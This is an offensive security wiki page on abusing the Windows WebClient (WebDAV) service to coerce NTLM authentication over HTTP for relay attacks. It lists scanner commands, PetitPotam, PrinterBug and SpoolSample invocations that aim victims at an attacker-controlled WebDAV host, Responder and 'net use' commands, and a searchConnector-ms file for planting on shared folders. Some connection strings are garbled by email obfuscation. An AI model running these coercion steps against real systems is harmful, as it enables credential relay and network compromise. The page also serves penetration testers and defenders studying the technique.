WebClient abuse (WebDAV)
Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)
The WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug) to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.
Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.
UNIX-like
Windows
From UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using CrackMapExec (Python).
webclientservicescanner 'domain.local'/'user':'password'@'machine'
crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine'
Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The "other" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.
The WebDAV Connection String format is:
\\[email protected]\PATH\TO\DIR.To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
SpoolSample.exe "VICTIM_IP" "[email protected]/randomfile.txt"
# PetitPotam
Petitpotam.py "[email protected]/randomfile.txt" "VICTIM_IP"
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
PetitPotam.exe "[email protected]/randomfile.txt" "VICTIM_IP"
On a side note, making a remote system start the WebClient service can be done in many ways
Map a WebDAV server
searchConnector-ms
Explorer
By mapping a remote WebDAV server. This can be done by having Responder's server up and by running the
net use cmdlet.# starting responder (in analyze mode to prevent poisoning)
responder --interface "eth0" --analyze
responder -I "eth0" -A
# map the drive from the target WebClient needs to be started on
net use x: http://$RESPONDER_IP/
With a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>
By opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.
Last modified 1yr ago